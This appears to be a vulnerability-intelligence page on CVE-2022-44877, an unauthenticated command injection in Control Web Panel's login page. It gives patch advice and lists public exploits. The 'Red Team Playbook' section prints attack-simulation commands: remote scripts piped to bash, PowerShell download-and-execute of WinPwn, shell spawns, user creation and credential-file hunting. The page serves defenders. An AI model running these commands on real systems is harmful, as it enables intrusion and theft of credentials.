CVE-2022-44877
Overview
This vulnerability is a command injection flaw rooted in improper input validation of the 'login' parameter within the /login/index.php component of Control Web Panel (CWP) versions prior to 0.9.8.1147. The application fails to sanitize shell metacharacters, allowing crafted input to be interpreted as operating system commands. This insecure handling occurs in the authentication interface, enabling execution of arbitrary OS commands via HTTP requests.
Vulnerability Description
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
Impact
An unauthenticated attacker can execute arbitrary system commands on the affected server by exploiting this vulnerability, enabling full control over the system. This includes executing malware, accessing sensitive information, modifying data, and potentially disrupting services. No user interaction or credentials are required, making it a severe risk for unauthorized remote compromise of the affected Control Web Panel installations.
Solution
Upgrade Control Web Panel to version 0.9.8.1147 or later, where this command injection flaw has been addressed. Refer to the official vendor advisories and patch notes linked in the provided references for detailed update instructions. Applying this update will sanitize the 'login' parameter input and prevent shell metacharacter injection. No specific workarounds are documented; timely patching is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Control Web Panel (CWP) allows remote attackers to execute arbitrary operating system commands through the manipulation of the login parameter in the login/index.php file. This flaw arises from insufficient input validation, which permits the injection of shell metacharacters. When an attacker crafts a malicious request containing these characters, the web application may unwittingly execute commands on the server, leading to unauthorized access and control over the underlying operating system. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk that requires immediate attention.
Attack vectors for this vulnerability are primarily web-based, targeting the login functionality of the Control Web Panel. An attacker could exploit this flaw by sending specially crafted HTTP requests that include shell metacharacters in the login parameter. For instance, an attacker might attempt to execute commands such as `; ls` or `&& whoami`, which could reveal sensitive information or allow further exploitation of the server. Given that this vulnerability does not require prior authentication, it significantly lowers the barrier for attackers, enabling them to execute commands remotely without needing valid credentials. This ease of exploitation makes the vulnerability particularly dangerous, as it can be leveraged in automated attacks or by less sophisticated threat actors.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely on CWP for managing their web hosting environments. Successful exploitation could lead to complete system compromise, allowing attackers to manipulate files, access sensitive data, or deploy malware. The business risks associated with such an incident include potential data breaches, loss of customer trust, operational disruptions, and financial repercussions stemming from remediation efforts and regulatory fines. Furthermore, the presence of this vulnerability could serve as a foothold for attackers to pivot to other systems within the network, amplifying the overall risk to the organization.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular vulnerability assessments and penetration testing should be conducted to identify and remediate any weaknesses in their systems. Additionally, web application firewalls (WAFs) can be employed to filter out malicious requests that attempt to exploit this vulnerability. It is also crucial to keep the Control Web Panel and all associated software up to date with the latest security patches, as updates often address known vulnerabilities. Furthermore, organizations should enforce strict input validation and sanitization practices within their applications to prevent command injection attacks. Educating developers about secure coding practices can also significantly reduce the likelihood of similar vulnerabilities being introduced in the future.
In conclusion, the vulnerability present in the Control Web Panel represents a critical threat that can lead to severe consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such threats. Implementing robust detection and mitigation strategies is essential to safeguard sensitive information and maintain the integrity of their systems. As the landscape of cybersecurity continues to evolve, proactive measures and a commitment to security best practices will be vital in reducing the risk posed by vulnerabilities of this nature.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Control-Webpanel | Webpanel | All |
cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
CWP login.php Unauthenticated RCE
exploits/linux/http/control_web_panel_login_cmd_exec
|
Spencer McIntyre, Numan Türle | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) | Mayank Deshmukh | webapps | php | - | View |
| Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) | numan türle | webapps | linux | - | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
numanturle/CVE-2022-44877
|
numanturle | 103 | 23 | 2023-01-05 | View |
|
komomon/CVE-2022-44877-RCE
CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution
|
komomon | 9 | 1 | 2023-01-06 | View |
|
hotpotcookie/CVE-2022-44877-white-box
Red Team utilities for setting up CWP CentOS 7 payload & reverse shell (Red Team 9 - CW2023)
|
hotpotcookie | 6 | 0 | 2023-02-15 | View |
|
Chocapikk/CVE-2022-44877
Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)
|
Chocapikk | 4 | 1 | 2023-02-11 | View |
|
ColdFusionX/CVE-2022-44877-CWP7
Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) (Unauthenticated)
|
ColdFusionX | 1 | 0 | 2023-02-02 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
dkstar11q/CVE-2022-44877
Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)
|
dkstar11q | 0 | 0 | 2023-03-27 | View |
|
rhymsc/CVE-2022-44877-RCE
|
rhymsc | 0 | 0 | 2023-11-18 | View |
|
G01d3nW01f/CVE-2022-44877
|
G01d3nW01f | 0 | 0 | 2024-02-27 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-44877 |
| youtube.com |
GitHub CVE
|
https://www.youtube.com/watch?v=kiLfSvc1SYY |
| gist.github.com |
GitHub CVE
|
https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386 |
| seclists.org |
GitHub CVE
mailing-list
|
http://seclists.org/fulldisclosure/2023/Jan/1 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/170388/Control-Web-Panel-7-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/170820/Control-Web-Panel-Unauthenticated-Remote-Command-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-44877 |